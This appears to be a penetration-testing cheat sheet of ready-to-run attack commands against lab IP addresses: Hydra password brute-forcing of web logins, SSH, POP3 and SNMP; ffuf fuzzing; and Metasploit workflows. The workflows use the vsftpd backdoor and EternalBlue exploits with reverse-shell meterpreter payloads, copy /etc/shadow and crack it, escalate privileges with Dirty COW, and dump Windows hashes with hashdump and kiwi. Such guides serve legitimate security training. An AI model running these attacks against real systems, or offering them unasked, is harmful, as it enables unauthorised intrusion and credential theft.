Web-Fuzzing

Hydra is a powerful tool used for performing brute-force attacks on various services. In this tutorial, we’ll explore brute-forcing login pages using different HTTP methods with Hydra. Brute Force Login Page with HTTP GET Method: hydra -C $PAYLOADS/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt $IP http-get /manager/html -s 8080 hydra -C $PAYLOADS/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://$IP:8080/manager/html Initiates the Hydra tool and specifies the target URL using the HTTP GET method. Brute Force Login Page with HTTP POST Method: hydra -l darren -P /usr/share/dict/rockyou.txt 10.10.69.229 http-post-form '/:user=^USER^&pass=^PASS^:F=Error: Invalid username or password' -s 8088 hydra -l '' -P 3_digit_pin.txt $IP http-form-post '/login.php:pin=^PASS^:F=Access denied' -s 8000 -v -f Initiates the Hydra tool and specifies the target URL using the HTTP POST method. Brute Force Credentials of POP3 Protocol: hydra -l doak -P /usr/share/dict/fasttrack.txt pop3://$IP -s 55007 Brute Force Credentials of SSH Protocol: hydra -l meliodas -P /usr/share/dict/rockyou.txt ssh://$IP Brute Force Credentials of SNMP Protocol: hydra -P /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt snmp://10.10.152.137 Hydra Options Explained: -C <file>: Specifies the path to the file containing a list of username and password combinations. i.e, admin:admin -L <username file>: Specifies the path to a file containing a list of usernames. -l <username>: Specifies a single username to use for the brute-force attack. -P <password file>: Specifies the path to a file containing a list of passwords. -p <password>: Specifies a single password to use for the brute-force attack. -f / -F : exit when a login/pass pair is found (-M: -f per host, -F global) $IP: Represents the IP address of the target. -s <port>: Specifies the target port. http-get: Initiates a brute-force attack using the HTTP GET method. http-post-form: Initiates a brute-force attack using the HTTP POST method with form parameters. pop3://<IP>: Specifies the POP3 protocol and target IP address. ssh://<IP>: Specifies the SSH protocol and target IP address. snmp://<IP>: Specifies the SNMP protocol and target IP address. Additional flags and options may be included for more detailed configuration and verbose output.

1. Directory and File Brute Forcing Basic Directory Fuzzing: ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ/ Fuzz common directory names (e.g., /admin/, /uploads/). 2. Fuzzing Parameters Basic Parameter Fuzzing: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ Replaces FUZZ with words from the wordlist to test URL parameters. Filter by Status Code: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -mc 200 Shows responses only for the 200 OK status code. Filter by Content Size: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -fs 150 Filters results based on exact response size in bytes. Fuzzing with JSON Payload (for APIs): ...

These codes indicate that the request was successfully received, understood, and accepted. 200 OK: The request was successful. 201 Created: The request was successful, and a resource was created. 202 Accepted: The request has been accepted but not yet processed. 204 No Content: The request was successful, but there is no content to send back. 3xx: Redirection These codes indicate that further action is needed to complete the request. 301 Moved Permanently: The resource has been permanently moved to a new URL. ...

🌐 1.Start Metasploit Console sudo systemctl start postgresql msfconsole Initialize the Metasploit Database (First Time Only) msfdb init 🔍 2. Scanning Targets Quick Target Discovery nmap -sn 10.10.10.0/24 Full Port + Version Scan (Integrated with Metasploit DB) db_nmap -sC -sV -O -Pn 10.10.10.129 View Discovered Hosts & Services hosts services 🪡 3. Exploit Search and Module Use Search by service name or CVE search vsftpd search type:exploit name:smb Load a Module use exploit/unix/ftp/vsftpd_234_backdoor Explore Module Info info # Shows full module details (author, platform, options, etc) show options # Required + optional settings (RHOSTS, LHOST, etc) show advanced # Advanced options like threads, timeouts, proxies show payloads # Compatible payloads for this exploit 💡 4. Linux Exploitation Workflow Example: FTP Backdoor use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 10.10.10.129 set payload cmd/unix/interact run If Shell is Basic: Upgrade python3 -c 'import pty; pty.spawn("/bin/bash")' Or Use Web Delivery use exploit/multi/script/web_delivery set payload linux/x86/meterpreter/reverse_tcp set LHOST <your_ip> set LPORT 4444 run Post-Exploitation (Linux) sessions -i 1 getuid sysinfo Enumerate OS and Configs run post/linux/gather/enum_os run post/linux/gather/enum_configs Dump Password Hashes download /etc/passwd download /etc/shadow john shadow --wordlist=/usr/share/wordlists/rockyou.txt Local Exploit Suggestion run post/multi/recon/local_exploit_suggester Example Local Root Exploit use exploit/linux/local/dirty_cow set SESSION 1 run Confirm Root id whoami 💻 5. Windows Exploitation Workflow Example: EternalBlue use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 10.10.10.130 set LHOST <your_ip> set payload windows/x64/meterpreter/reverse_tcp run Session Handling sessions sessions -i 1 sysinfo getuid Post-Exploitation (Windows) Dump Hashes hashdump load kiwi kiwi_cmd "lsadump::sam" Process Migration ps migrate <pid> getpid Privilege Escalation getsystem Or use: ...